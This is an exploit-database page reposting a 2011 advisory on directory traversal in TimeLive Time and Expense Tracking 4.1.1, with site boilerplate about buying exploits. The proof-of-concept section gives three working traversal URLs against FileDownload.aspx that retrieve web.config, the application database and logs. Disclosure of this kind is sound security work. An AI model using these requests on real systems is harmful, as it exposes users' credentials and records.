0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TimeLive Time and Expense Tracking 4.1.1 Multiple Vulnerabilities
############################################################################### # Exploit Title : TimeLive Time and Expense Tracking <= Multiple Vulnerabilities # Vulnerability : Directory Traversal / Remote Database Download / File Download / Source Code Disclosure # Date : 28/09/2011 # Author : Nathaniel Carew # Impact : High # Software Link : http://www.livetecs.com/Release/TimeLiveWebSetup.exe # Platform : ASP.NET # Version : 4.1.1 # Tested on : Windows Server Standard 2003 SP 2 / IIS 6 # Thanks : Peregrinus & shiznat ############################################################################### Overview: --------- When using the import/export feature for csv/project/quickbooks files under: http://localhost/TimeLive/AccountAdmin/AccountImportExport.aspx You are able to modify the file download URL you are redirected too and traverse directories to download the hosted files including the TimeLive database: Proof of Concept: ----------------- http://localhost/TimeLive/Shared/FileDownload.aspx?FileName=..\web.config http://localhost/TimeLive/Shared/FileDownload.aspx?FileName=..\App_Data\TimeLive.mdf http://localhost/TimeLive/Shared/FileDownload.aspx?FileName=..\Log\TimeLive.log Impact: ------- Successful exploitation could allow an attacker to download the complete database of users information including email addresses, usernames and passwords and associated timesheet and expense data along with any files contained within the subfolder of wwwroot. # 0day.today [2024-11-16] #